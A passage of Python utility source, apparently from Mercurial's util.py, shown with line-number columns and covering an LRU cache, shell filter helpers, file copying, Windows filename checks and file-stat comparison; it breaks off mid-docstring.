813 1035 self._movetohead(node)
814 1036 return node.value
815 1037
816 1038 def __setitem__(self, k, v):
817 1039 node = self._cache.get(k)
818 1040 # Replace existing value and mark as newest.
819 1041 if node is not None:
820 1042 node.value = v
821 1043 self._movetohead(node)
822 1044 return
823 1045
824 1046 if self._size < self._capacity:
825 1047 node = self._addcapacity()
826 1048 else:
827 1049 # Grab the last/oldest item.
828 1050 node = self._head.prev
829 1051
830 1052 # At capacity. Kill the old entry.
831 1053 if node.key is not _notset:
832 1054 del self._cache[node.key]
833 1055
834 1056 node.key = k
835 1057 node.value = v
836 1058 self._cache[k] = node
837 1059 # And mark it as newest entry. No need to adjust order since it
838 1060 # is already self._head.prev.
839 1061 self._head = node
840 1062
841 1063 def __delitem__(self, k):
842 1064 node = self._cache.pop(k)
843 1065 node.markempty()
844 1066
845 1067 # Temporarily mark as newest item before re-adjusting head to make
846 1068 # this node the oldest item.
847 1069 self._movetohead(node)
848 1070 self._head = node.next
849 1071
850 1072 # Additional dict methods.
851 1073
852 1074 def get(self, k, default=None):
853 1075 try:
854 1076 return self._cache[k].value
855 1077 except KeyError:
856 1078 return default
857 1079
858 1080 def clear(self):
859 1081 n = self._head
860 1082 while n.key is not _notset:
861 1083 n.markempty()
862 1084 n = n.next
863 1085
864 1086 self._cache.clear()
865 1087
866 1088 def copy(self):
867 1089 result = lrucachedict(self._capacity)
868 1090 n = self._head.prev
869 1091 # Iterate in oldest-to-newest order, so the copy has the right ordering
870 1092 for i in range(len(self._cache)):
871 1093 result[n.key] = n.value
872 1094 n = n.prev
873 1095 return result
874 1096
875 1097 def _movetohead(self, node):
876 1098 """Mark a node as the newest, making it the new head.
877 1099
878 1100 When a node is accessed, it becomes the freshest entry in the LRU
879 1101 list, which is denoted by self._head.
880 1102
881 1103 Visually, let's make ``N`` the new head node (* denotes head):
882 1104
883 1105 previous/oldest <-> head <-> next/next newest
884 1106
885 1107 ----<->--- A* ---<->-----
886 1108 | |
887 1109 E <-> D <-> N <-> C <-> B
888 1110
889 1111 To:
890 1112
891 1113 ----<->--- N* ---<->-----
892 1114 | |
893 1115 E <-> D <-> C <-> B <-> A
894 1116
895 1117 This requires the following moves:
896 1118
897 1119 C.next = D (node.prev.next = node.next)
898 1120 D.prev = C (node.next.prev = node.prev)
899 1121 E.next = N (head.prev.next = node)
900 1122 N.prev = E (node.prev = head.prev)
901 1123 N.next = A (node.next = head)
902 1124 A.prev = N (head.prev = node)
903 1125 """
904 1126 head = self._head
905 1127 # C.next = D
906 1128 node.prev.next = node.next
907 1129 # D.prev = C
908 1130 node.next.prev = node.prev
909 1131 # N.prev = E
910 1132 node.prev = head.prev
911 1133 # N.next = A
912 1134 # It is tempting to do just "head" here, however if node is
913 1135 # adjacent to head, this will do bad things.
914 1136 node.next = head.prev.next
915 1137 # E.next = N
916 1138 node.next.prev = node
917 1139 # A.prev = N
918 1140 node.prev.next = node
919 1141
920 1142 self._head = node
921 1143
922 1144 def _addcapacity(self):
923 1145 """Add a node to the circular linked list.
924 1146
925 1147 The new node is inserted before the head node.
926 1148 """
927 1149 head = self._head
928 1150 node = _lrucachenode()
929 1151 head.prev.next = node
930 1152 node.prev = head.prev
931 1153 node.next = head
932 1154 head.prev = node
933 1155 self._size += 1
934 1156 return node
935 1157
936 1158 def lrucachefunc(func):
937 1159 '''cache most recent results of function calls'''
938 1160 cache = {}
939 1161 order = collections.deque()
940 1162 if func.__code__.co_argcount == 1:
941 1163 def f(arg):
942 1164 if arg not in cache:
943 1165 if len(cache) > 20:
944 1166 del cache[order.popleft()]
945 1167 cache[arg] = func(arg)
946 1168 else:
947 1169 order.remove(arg)
948 1170 order.append(arg)
949 1171 return cache[arg]
950 1172 else:
951 1173 def f(*args):
952 1174 if args not in cache:
953 1175 if len(cache) > 20:
954 1176 del cache[order.popleft()]
955 1177 cache[args] = func(*args)
956 1178 else:
957 1179 order.remove(args)
958 1180 order.append(args)
959 1181 return cache[args]
960 1182
961 1183 return f
962 1184
963 1185 class propertycache(object):
964 1186 def __init__(self, func):
965 1187 self.func = func
966 1188 self.name = func.__name__
967 1189 def __get__(self, obj, type=None):
968 1190 result = self.func(obj)
969 1191 self.cachevalue(obj, result)
970 1192 return result
971 1193
972 1194 def cachevalue(self, obj, value):
973 1195 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
974 1196 obj.__dict__[self.name] = value
975 1197
976 1198 def clearcachedproperty(obj, prop):
977 1199 '''clear a cached property value, if one has been set'''
978 1200 if prop in obj.__dict__:
979 1201 del obj.__dict__[prop]
980 1202
981 1203 def pipefilter(s, cmd):
982 1204 '''filter string S through command CMD, returning its output'''
983 1205 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
984 1206 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
985 1207 pout, perr = p.communicate(s)
986 1208 return pout
987 1209
988 1210 def tempfilter(s, cmd):
989 1211 '''filter string S through a pair of temporary files with CMD.
990 1212 CMD is used as a template to create the real command to be run,
991 1213 with the strings INFILE and OUTFILE replaced by the real names of
992 1214 the temporary files generated.'''
993 1215 inname, outname = None, None
994 1216 try:
995 1217 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
996 1218 fp = os.fdopen(infd, pycompat.sysstr('wb'))
997 1219 fp.write(s)
998 1220 fp.close()
999 1221 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1000 1222 os.close(outfd)
1001 1223 cmd = cmd.replace('INFILE', inname)
1002 1224 cmd = cmd.replace('OUTFILE', outname)
1003 1225 code = os.system(cmd)
1004 1226 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1005 1227 code = 0
1006 1228 if code:
1007 1229 raise Abort(_("command '%s' failed: %s") %
1008 1230 (cmd, explainexit(code)))
1009 1231 return readfile(outname)
1010 1232 finally:
1011 1233 try:
1012 1234 if inname:
1013 1235 os.unlink(inname)
1014 1236 except OSError:
1015 1237 pass
1016 1238 try:
1017 1239 if outname:
1018 1240 os.unlink(outname)
1019 1241 except OSError:
1020 1242 pass
1021 1243
1022 1244 filtertable = {
1023 1245 'tempfile:': tempfilter,
1024 1246 'pipe:': pipefilter,
1025 1247 }
1026 1248
1027 1249 def filter(s, cmd):
1028 1250 "filter a string through a command that transforms its input to its output"
1029 1251 for name, fn in filtertable.iteritems():
1030 1252 if cmd.startswith(name):
1031 1253 return fn(s, cmd[len(name):].lstrip())
1032 1254 return pipefilter(s, cmd)
1033 1255
1034 1256 def binary(s):
1035 1257 """return true if a string is binary data"""
1036 1258 return bool(s and '\0' in s)
1037 1259
1038 1260 def increasingchunks(source, min=1024, max=65536):
1039 1261 '''return no less than min bytes per chunk while data remains,
1040 1262 doubling min after each chunk until it reaches max'''
1041 1263 def log2(x):
1042 1264 if not x:
1043 1265 return 0
1044 1266 i = 0
1045 1267 while x:
1046 1268 x >>= 1
1047 1269 i += 1
1048 1270 return i - 1
1049 1271
1050 1272 buf = []
1051 1273 blen = 0
1052 1274 for chunk in source:
1053 1275 buf.append(chunk)
1054 1276 blen += len(chunk)
1055 1277 if blen >= min:
1056 1278 if min < max:
1057 1279 min = min << 1
1058 1280 nmin = 1 << log2(blen)
1059 1281 if nmin > min:
1060 1282 min = nmin
1061 1283 if min > max:
1062 1284 min = max
1063 1285 yield ''.join(buf)
1064 1286 blen = 0
1065 1287 buf = []
1066 1288 if buf:
1067 1289 yield ''.join(buf)
1068 1290
1069 1291 Abort = error.Abort
1070 1292
1071 1293 def always(fn):
1072 1294 return True
1073 1295
1074 1296 def never(fn):
1075 1297 return False
1076 1298
1077 1299 def nogc(func):
1078 1300 """disable garbage collector
1079 1301
1080 1302 Python's garbage collector triggers a GC each time a certain number of
1081 1303 container objects (the number being defined by gc.get_threshold()) are
1082 1304 allocated even when marked not to be tracked by the collector. Tracking has
1083 1305 no effect on when GCs are triggered, only on what objects the GC looks
1084 1306 into. As a workaround, disable GC while building complex (huge)
1085 1307 containers.
1086 1308
1087 1309 This garbage collector issue have been fixed in 2.7. But it still affect
1088 1310 CPython's performance.
1089 1311 """
1090 1312 def wrapper(*args, **kwargs):
1091 1313 gcenabled = gc.isenabled()
1092 1314 gc.disable()
1093 1315 try:
1094 1316 return func(*args, **kwargs)
1095 1317 finally:
1096 1318 if gcenabled:
1097 1319 gc.enable()
1098 1320 return wrapper
1099 1321
1100 1322 if pycompat.ispypy:
1101 1323 # PyPy runs slower with gc disabled
1102 1324 nogc = lambda x: x
1103 1325
1104 1326 def pathto(root, n1, n2):
1105 1327 '''return the relative path from one place to another.
1106 1328 root should use os.sep to separate directories
1107 1329 n1 should use os.sep to separate directories
1108 1330 n2 should use "/" to separate directories
1109 1331 returns an os.sep-separated path.
1110 1332
1111 1333 If n1 is a relative path, it's assumed it's
1112 1334 relative to root.
1113 1335 n2 should always be relative to root.
1114 1336 '''
1115 1337 if not n1:
1116 1338 return localpath(n2)
1117 1339 if os.path.isabs(n1):
1118 1340 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1119 1341 return os.path.join(root, localpath(n2))
1120 1342 n2 = '/'.join((pconvert(root), n2))
1121 1343 a, b = splitpath(n1), n2.split('/')
1122 1344 a.reverse()
1123 1345 b.reverse()
1124 1346 while a and b and a[-1] == b[-1]:
1125 1347 a.pop()
1126 1348 b.pop()
1127 1349 b.reverse()
1128 1350 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1129 1351
1130 1352 def mainfrozen():
1131 1353 """return True if we are a frozen executable.
1132 1354
1133 1355 The code supports py2exe (most common, Windows only) and tools/freeze
1134 1356 (portable, not much used).
1135 1357 """
1136 1358 return (safehasattr(sys, "frozen") or # new py2exe
1137 1359 safehasattr(sys, "importers") or # old py2exe
1138 1360 imp.is_frozen(u"__main__")) # tools/freeze
1139 1361
1140 1362 # the location of data files matching the source code
1141 1363 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1142 1364 # executable version (py2exe) doesn't support __file__
1143 1365 datapath = os.path.dirname(pycompat.sysexecutable)
1144 1366 else:
1145 1367 datapath = os.path.dirname(pycompat.fsencode(__file__))
1146 1368
1147 1369 i18n.setdatapath(datapath)
1148 1370
1149 1371 _hgexecutable = None
1150 1372
1151 1373 def hgexecutable():
1152 1374 """return location of the 'hg' executable.
1153 1375
1154 1376 Defaults to $HG or 'hg' in the search path.
1155 1377 """
1156 1378 if _hgexecutable is None:
1157 1379 hg = encoding.environ.get('HG')
1158 1380 mainmod = sys.modules[pycompat.sysstr('__main__')]
1159 1381 if hg:
1160 1382 _sethgexecutable(hg)
1161 1383 elif mainfrozen():
1162 1384 if getattr(sys, 'frozen', None) == 'macosx_app':
1163 1385 # Env variable set by py2app
1164 1386 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1165 1387 else:
1166 1388 _sethgexecutable(pycompat.sysexecutable)
1167 1389 elif (os.path.basename(
1168 1390 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1169 1391 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1170 1392 else:
1171 1393 exe = findexe('hg') or os.path.basename(sys.argv[0])
1172 1394 _sethgexecutable(exe)
1173 1395 return _hgexecutable
1174 1396
1175 1397 def _sethgexecutable(path):
1176 1398 """set location of the 'hg' executable"""
1177 1399 global _hgexecutable
1178 1400 _hgexecutable = path
1179 1401
1180 1402 def _isstdout(f):
1181 1403 fileno = getattr(f, 'fileno', None)
1182 1404 try:
1183 1405 return fileno and fileno() == sys.__stdout__.fileno()
1184 1406 except io.UnsupportedOperation:
1185 1407 return False # fileno() raised UnsupportedOperation
1186 1408
1187 1409 def shellenviron(environ=None):
1188 1410 """return environ with optional override, useful for shelling out"""
1189 1411 def py2shell(val):
1190 1412 'convert python object into string that is useful to shell'
1191 1413 if val is None or val is False:
1192 1414 return '0'
1193 1415 if val is True:
1194 1416 return '1'
1195 1417 return pycompat.bytestr(val)
1196 1418 env = dict(encoding.environ)
1197 1419 if environ:
1198 1420 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1199 1421 env['HG'] = hgexecutable()
1200 1422 return env
1201 1423
1202 1424 def system(cmd, environ=None, cwd=None, out=None):
1203 1425 '''enhanced shell command execution.
1204 1426 run with environment maybe modified, maybe in different dir.
1205 1427
1206 1428 if out is specified, it is assumed to be a file-like object that has a
1207 1429 write() method. stdout and stderr will be redirected to out.'''
1208 1430 try:
1209 1431 stdout.flush()
1210 1432 except Exception:
1211 1433 pass
1212 1434 cmd = quotecommand(cmd)
1213 1435 env = shellenviron(environ)
1214 1436 if out is None or _isstdout(out):
1215 1437 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1216 1438 env=env, cwd=cwd)
1217 1439 else:
1218 1440 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1219 1441 env=env, cwd=cwd, stdout=subprocess.PIPE,
1220 1442 stderr=subprocess.STDOUT)
1221 1443 for line in iter(proc.stdout.readline, ''):
1222 1444 out.write(line)
1223 1445 proc.wait()
1224 1446 rc = proc.returncode
1225 1447 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1226 1448 rc = 0
1227 1449 return rc
1228 1450
1229 1451 def checksignature(func):
1230 1452 '''wrap a function with code to check for calling errors'''
1231 1453 def check(*args, **kwargs):
1232 1454 try:
1233 1455 return func(*args, **kwargs)
1234 1456 except TypeError:
1235 1457 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1236 1458 raise error.SignatureError
1237 1459 raise
1238 1460
1239 1461 return check
1240 1462
1241 1463 # a whilelist of known filesystems where hardlink works reliably
1242 1464 _hardlinkfswhitelist = {
1243 1465 'btrfs',
1244 1466 'ext2',
1245 1467 'ext3',
1246 1468 'ext4',
1247 1469 'hfs',
1248 1470 'jfs',
1249 1471 'NTFS',
1250 1472 'reiserfs',
1251 1473 'tmpfs',
1252 1474 'ufs',
1253 1475 'xfs',
1254 1476 'zfs',
1255 1477 }
1256 1478
1257 1479 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1258 1480 '''copy a file, preserving mode and optionally other stat info like
1259 1481 atime/mtime
1260 1482
1261 1483 checkambig argument is used with filestat, and is useful only if
1262 1484 destination file is guarded by any lock (e.g. repo.lock or
1263 1485 repo.wlock).
1264 1486
1265 1487 copystat and checkambig should be exclusive.
1266 1488 '''
1267 1489 assert not (copystat and checkambig)
1268 1490 oldstat = None
1269 1491 if os.path.lexists(dest):
1270 1492 if checkambig:
1271 1493 oldstat = checkambig and filestat.frompath(dest)
1272 1494 unlink(dest)
1273 1495 if hardlink:
1274 1496 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1275 1497 # unless we are confident that dest is on a whitelisted filesystem.
1276 1498 try:
1277 1499 fstype = getfstype(os.path.dirname(dest))
1278 1500 except OSError:
1279 1501 fstype = None
1280 1502 if fstype not in _hardlinkfswhitelist:
1281 1503 hardlink = False
1282 1504 if hardlink:
1283 1505 try:
1284 1506 oslink(src, dest)
1285 1507 return
1286 1508 except (IOError, OSError):
1287 1509 pass # fall back to normal copy
1288 1510 if os.path.islink(src):
1289 1511 os.symlink(os.readlink(src), dest)
1290 1512 # copytime is ignored for symlinks, but in general copytime isn't needed
1291 1513 # for them anyway
1292 1514 else:
1293 1515 try:
1294 1516 shutil.copyfile(src, dest)
1295 1517 if copystat:
1296 1518 # copystat also copies mode
1297 1519 shutil.copystat(src, dest)
1298 1520 else:
1299 1521 shutil.copymode(src, dest)
1300 1522 if oldstat and oldstat.stat:
1301 1523 newstat = filestat.frompath(dest)
1302 1524 if newstat.isambig(oldstat):
1303 1525 # stat of copied file is ambiguous to original one
1304 1526 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1305 1527 os.utime(dest, (advanced, advanced))
1306 1528 except shutil.Error as inst:
1307 1529 raise Abort(str(inst))
1308 1530
1309 1531 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1310 1532 """Copy a directory tree using hardlinks if possible."""
1311 1533 num = 0
1312 1534
1313 1535 gettopic = lambda: hardlink and _('linking') or _('copying')
1314 1536
1315 1537 if os.path.isdir(src):
1316 1538 if hardlink is None:
1317 1539 hardlink = (os.stat(src).st_dev ==
1318 1540 os.stat(os.path.dirname(dst)).st_dev)
1319 1541 topic = gettopic()
1320 1542 os.mkdir(dst)
1321 1543 for name, kind in listdir(src):
1322 1544 srcname = os.path.join(src, name)
1323 1545 dstname = os.path.join(dst, name)
1324 1546 def nprog(t, pos):
1325 1547 if pos is not None:
1326 1548 return progress(t, pos + num)
1327 1549 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1328 1550 num += n
1329 1551 else:
1330 1552 if hardlink is None:
1331 1553 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1332 1554 os.stat(os.path.dirname(dst)).st_dev)
1333 1555 topic = gettopic()
1334 1556
1335 1557 if hardlink:
1336 1558 try:
1337 1559 oslink(src, dst)
1338 1560 except (IOError, OSError):
1339 1561 hardlink = False
1340 1562 shutil.copy(src, dst)
1341 1563 else:
1342 1564 shutil.copy(src, dst)
1343 1565 num += 1
1344 1566 progress(topic, num)
1345 1567 progress(topic, None)
1346 1568
1347 1569 return hardlink, num
1348 1570
1349 1571 _winreservednames = {
1350 1572 'con', 'prn', 'aux', 'nul',
1351 1573 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1352 1574 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1353 1575 }
1354 1576 _winreservedchars = ':*?"<>|'
1355 1577 def checkwinfilename(path):
1356 1578 r'''Check that the base-relative path is a valid filename on Windows.
1357 1579 Returns None if the path is ok, or a UI string describing the problem.
1358 1580
1359 1581 >>> checkwinfilename(b"just/a/normal/path")
1360 1582 >>> checkwinfilename(b"foo/bar/con.xml")
1361 1583 "filename contains 'con', which is reserved on Windows"
1362 1584 >>> checkwinfilename(b"foo/con.xml/bar")
1363 1585 "filename contains 'con', which is reserved on Windows"
1364 1586 >>> checkwinfilename(b"foo/bar/xml.con")
1365 1587 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1366 1588 "filename contains 'AUX', which is reserved on Windows"
1367 1589 >>> checkwinfilename(b"foo/bar/bla:.txt")
1368 1590 "filename contains ':', which is reserved on Windows"
1369 1591 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1370 1592 "filename contains '\\x07', which is invalid on Windows"
1371 1593 >>> checkwinfilename(b"foo/bar/bla ")
1372 1594 "filename ends with ' ', which is not allowed on Windows"
1373 1595 >>> checkwinfilename(b"../bar")
1374 1596 >>> checkwinfilename(b"foo\\")
1375 1597 "filename ends with '\\', which is invalid on Windows"
1376 1598 >>> checkwinfilename(b"foo\\/bar")
1377 1599 "directory name ends with '\\', which is invalid on Windows"
1378 1600 '''
1379 1601 if path.endswith('\\'):
1380 1602 return _("filename ends with '\\', which is invalid on Windows")
1381 1603 if '\\/' in path:
1382 1604 return _("directory name ends with '\\', which is invalid on Windows")
1383 1605 for n in path.replace('\\', '/').split('/'):
1384 1606 if not n:
1385 1607 continue
1386 1608 for c in _filenamebytestr(n):
1387 1609 if c in _winreservedchars:
1388 1610 return _("filename contains '%s', which is reserved "
1389 1611 "on Windows") % c
1390 1612 if ord(c) <= 31:
1391 1613 return _("filename contains '%s', which is invalid "
1392 1614 "on Windows") % escapestr(c)
1393 1615 base = n.split('.')[0]
1394 1616 if base and base.lower() in _winreservednames:
1395 1617 return _("filename contains '%s', which is reserved "
1396 1618 "on Windows") % base
1397 1619 t = n[-1:]
1398 1620 if t in '. ' and n not in '..':
1399 1621 return _("filename ends with '%s', which is not allowed "
1400 1622 "on Windows") % t
1401 1623
1402 1624 if pycompat.iswindows:
1403 1625 checkosfilename = checkwinfilename
1404 1626 timer = time.clock
1405 1627 else:
1406 1628 checkosfilename = platform.checkosfilename
1407 1629 timer = time.time
1408 1630
1409 1631 if safehasattr(time, "perf_counter"):
1410 1632 timer = time.perf_counter
1411 1633
1412 1634 def makelock(info, pathname):
1413 1635 try:
1414 1636 return os.symlink(info, pathname)
1415 1637 except OSError as why:
1416 1638 if why.errno == errno.EEXIST:
1417 1639 raise
1418 1640 except AttributeError: # no symlink in os
1419 1641 pass
1420 1642
1421 1643 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1422 1644 os.write(ld, info)
1423 1645 os.close(ld)
1424 1646
1425 1647 def readlock(pathname):
1426 1648 try:
1427 1649 return os.readlink(pathname)
1428 1650 except OSError as why:
1429 1651 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1430 1652 raise
1431 1653 except AttributeError: # no symlink in os
1432 1654 pass
1433 1655 fp = posixfile(pathname)
1434 1656 r = fp.read()
1435 1657 fp.close()
1436 1658 return r
1437 1659
1438 1660 def fstat(fp):
1439 1661 '''stat file object that may not have fileno method.'''
1440 1662 try:
1441 1663 return os.fstat(fp.fileno())
1442 1664 except AttributeError:
1443 1665 return os.stat(fp.name)
1444 1666
1445 1667 # File system features
1446 1668
1447 1669 def fscasesensitive(path):
1448 1670 """
1449 1671 Return true if the given path is on a case-sensitive filesystem
1450 1672
1451 1673 Requires a path (like /foo/.hg) ending with a foldable final
1452 1674 directory component.
1453 1675 """
1454 1676 s1 = os.lstat(path)
1455 1677 d, b = os.path.split(path)
1456 1678 b2 = b.upper()
1457 1679 if b == b2:
1458 1680 b2 = b.lower()
1459 1681 if b == b2:
1460 1682 return True # no evidence against case sensitivity
1461 1683 p2 = os.path.join(d, b2)
1462 1684 try:
1463 1685 s2 = os.lstat(p2)
1464 1686 if s2 == s1:
1465 1687 return False
1466 1688 return True
1467 1689 except OSError:
1468 1690 return True
1469 1691
1470 1692 try:
1471 1693 import re2
1472 1694 _re2 = None
1473 1695 except ImportError:
1474 1696 _re2 = False
1475 1697
1476 1698 class _re(object):
1477 1699 def _checkre2(self):
1478 1700 global _re2
1479 1701 try:
1480 1702 # check if match works, see issue3964
1481 1703 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1482 1704 except ImportError:
1483 1705 _re2 = False
1484 1706
1485 1707 def compile(self, pat, flags=0):
1486 1708 '''Compile a regular expression, using re2 if possible
1487 1709
1488 1710 For best performance, use only re2-compatible regexp features. The
1489 1711 only flags from the re module that are re2-compatible are
1490 1712 IGNORECASE and MULTILINE.'''
1491 1713 if _re2 is None:
1492 1714 self._checkre2()
1493 1715 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1494 1716 if flags & remod.IGNORECASE:
1495 1717 pat = '(?i)' + pat
1496 1718 if flags & remod.MULTILINE:
1497 1719 pat = '(?m)' + pat
1498 1720 try:
1499 1721 return re2.compile(pat)
1500 1722 except re2.error:
1501 1723 pass
1502 1724 return remod.compile(pat, flags)
1503 1725
1504 1726 @propertycache
1505 1727 def escape(self):
1506 1728 '''Return the version of escape corresponding to self.compile.
1507 1729
1508 1730 This is imperfect because whether re2 or re is used for a particular
1509 1731 function depends on the flags, etc, but it's the best we can do.
1510 1732 '''
1511 1733 global _re2
1512 1734 if _re2 is None:
1513 1735 self._checkre2()
1514 1736 if _re2:
1515 1737 return re2.escape
1516 1738 else:
1517 1739 return remod.escape
1518 1740
1519 1741 re = _re()
1520 1742
1521 1743 _fspathcache = {}
1522 1744 def fspath(name, root):
1523 1745 '''Get name in the case stored in the filesystem
1524 1746
1525 1747 The name should be relative to root, and be normcase-ed for efficiency.
1526 1748
1527 1749 Note that this function is unnecessary, and should not be
1528 1750 called, for case-sensitive filesystems (simply because it's expensive).
1529 1751
1530 1752 The root should be normcase-ed, too.
1531 1753 '''
1532 1754 def _makefspathcacheentry(dir):
1533 1755 return dict((normcase(n), n) for n in os.listdir(dir))
1534 1756
1535 1757 seps = pycompat.ossep
1536 1758 if pycompat.osaltsep:
1537 1759 seps = seps + pycompat.osaltsep
1538 1760 # Protect backslashes. This gets silly very quickly.
1539 1761 seps.replace('\\','\\\\')
1540 1762 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1541 1763 dir = os.path.normpath(root)
1542 1764 result = []
1543 1765 for part, sep in pattern.findall(name):
1544 1766 if sep:
1545 1767 result.append(sep)
1546 1768 continue
1547 1769
1548 1770 if dir not in _fspathcache:
1549 1771 _fspathcache[dir] = _makefspathcacheentry(dir)
1550 1772 contents = _fspathcache[dir]
1551 1773
1552 1774 found = contents.get(part)
1553 1775 if not found:
1554 1776 # retry "once per directory" per "dirstate.walk" which
1555 1777 # may take place for each patches of "hg qpush", for example
1556 1778 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1557 1779 found = contents.get(part)
1558 1780
1559 1781 result.append(found or part)
1560 1782 dir = os.path.join(dir, part)
1561 1783
1562 1784 return ''.join(result)
1563 1785
1564 1786 def checknlink(testfile):
1565 1787 '''check whether hardlink count reporting works properly'''
1566 1788
1567 1789 # testfile may be open, so we need a separate file for checking to
1568 1790 # work around issue2543 (or testfile may get lost on Samba shares)
1569 1791 f1, f2, fp = None, None, None
1570 1792 try:
1571 1793 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1572 1794 suffix='1~', dir=os.path.dirname(testfile))
1573 1795 os.close(fd)
1574 1796 f2 = '%s2~' % f1[:-2]
1575 1797
1576 1798 oslink(f1, f2)
1577 1799 # nlinks() may behave differently for files on Windows shares if
1578 1800 # the file is open.
1579 1801 fp = posixfile(f2)
1580 1802 return nlinks(f2) > 1
1581 1803 except OSError:
1582 1804 return False
1583 1805 finally:
1584 1806 if fp is not None:
1585 1807 fp.close()
1586 1808 for f in (f1, f2):
1587 1809 try:
1588 1810 if f is not None:
1589 1811 os.unlink(f)
1590 1812 except OSError:
1591 1813 pass
1592 1814
1593 1815 def endswithsep(path):
1594 1816 '''Check path ends with os.sep or os.altsep.'''
1595 1817 return (path.endswith(pycompat.ossep)
1596 1818 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1597 1819
1598 1820 def splitpath(path):
1599 1821 '''Split path by os.sep.
1600 1822 Note that this function does not use os.altsep because this is
1601 1823 an alternative of simple "xxx.split(os.sep)".
1602 1824 It is recommended to use os.path.normpath() before using this
1603 1825 function if need.'''
1604 1826 return path.split(pycompat.ossep)
1605 1827
1606 1828 def gui():
1607 1829 '''Are we running in a GUI?'''
1608 1830 if pycompat.isdarwin:
1609 1831 if 'SSH_CONNECTION' in encoding.environ:
1610 1832 # handle SSH access to a box where the user is logged in
1611 1833 return False
1612 1834 elif getattr(osutil, 'isgui', None):
1613 1835 # check if a CoreGraphics session is available
1614 1836 return osutil.isgui()
1615 1837 else:
1616 1838 # pure build; use a safe default
1617 1839 return True
1618 1840 else:
1619 1841 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1620 1842
1621 1843 def mktempcopy(name, emptyok=False, createmode=None):
1622 1844 """Create a temporary file with the same contents from name
1623 1845
1624 1846 The permission bits are copied from the original file.
1625 1847
1626 1848 If the temporary file is going to be truncated immediately, you
1627 1849 can use emptyok=True as an optimization.
1628 1850
1629 1851 Returns the name of the temporary file.
1630 1852 """
1631 1853 d, fn = os.path.split(name)
1632 1854 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1633 1855 os.close(fd)
1634 1856 # Temporary files are created with mode 0600, which is usually not
1635 1857 # what we want. If the original file already exists, just copy
1636 1858 # its mode. Otherwise, manually obey umask.
1637 1859 copymode(name, temp, createmode)
1638 1860 if emptyok:
1639 1861 return temp
1640 1862 try:
1641 1863 try:
1642 1864 ifp = posixfile(name, "rb")
1643 1865 except IOError as inst:
1644 1866 if inst.errno == errno.ENOENT:
1645 1867 return temp
1646 1868 if not getattr(inst, 'filename', None):
1647 1869 inst.filename = name
1648 1870 raise
1649 1871 ofp = posixfile(temp, "wb")
1650 1872 for chunk in filechunkiter(ifp):
1651 1873 ofp.write(chunk)
1652 1874 ifp.close()
1653 1875 ofp.close()
1654 1876 except: # re-raises
1655 1877 try:
1656 1878 os.unlink(temp)
1657 1879 except OSError:
1658 1880 pass
1659 1881 raise
1660 1882 return temp
1661 1883
1662 1884 class filestat(object):
1663 1885 """help to exactly detect change of a file
1664 1886
1665 1887 'stat' attribute is result of 'os.stat()' if specified 'path'
1666 1888 exists. Otherwise, it is None. This can avoid preparative
1667 1889 'exists()' examination on client side of this class.
1668 1890 """
1669 1891 def __init__(self, stat):
1670 1892 self.stat = stat
1671 1893
1672 1894 @classmethod
1673 1895 def frompath(cls, path):
1674 1896 try:
1675 1897 stat = os.stat(path)
1676 1898 except OSError as err:
1677 1899 if err.errno != errno.ENOENT:
1678 1900 raise
1679 1901 stat = None
1680 1902 return cls(stat)
1681 1903
1682 1904 @classmethod
1683 1905 def fromfp(cls, fp):
1684 1906 stat = os.fstat(fp.fileno())
1685 1907 return cls(stat)
1686 1908
1687 1909 __hash__ = object.__hash__
1688 1910
1689 1911 def __eq__(self, old):
1690 1912 try:
1691 1913 # if ambiguity between stat of new and old file is
1692 1914 # avoided, comparison of size, ctime and mtime is enough
1693 1915 # to exactly detect change of a file regardless of platform
1694 1916 return (self.stat.st_size == old.stat.st_size and
1695 1917 self.stat.st_ctime == old.stat.st_ctime and
1696 1918 self.stat.st_mtime == old.stat.st_mtime)
1697 1919 except AttributeError:
1698 1920 pass
1699 1921 try:
1700 1922 return self.stat is None and old.stat is None
1701 1923 except AttributeError:
1702 1924 return False
1703 1925
1704 1926 def isambig(self, old):
1705 1927 """Examine whether new (= self) stat is ambiguous against old one
1706 1928
1707 1929 "S[N]" below means stat of a file at N-th change:
1708 1930
1709 1931 - S[n-1].ctime < S[n].ctime: can detect change of a file
1710 1932 - S[n-1].ctime == S[n].ctime
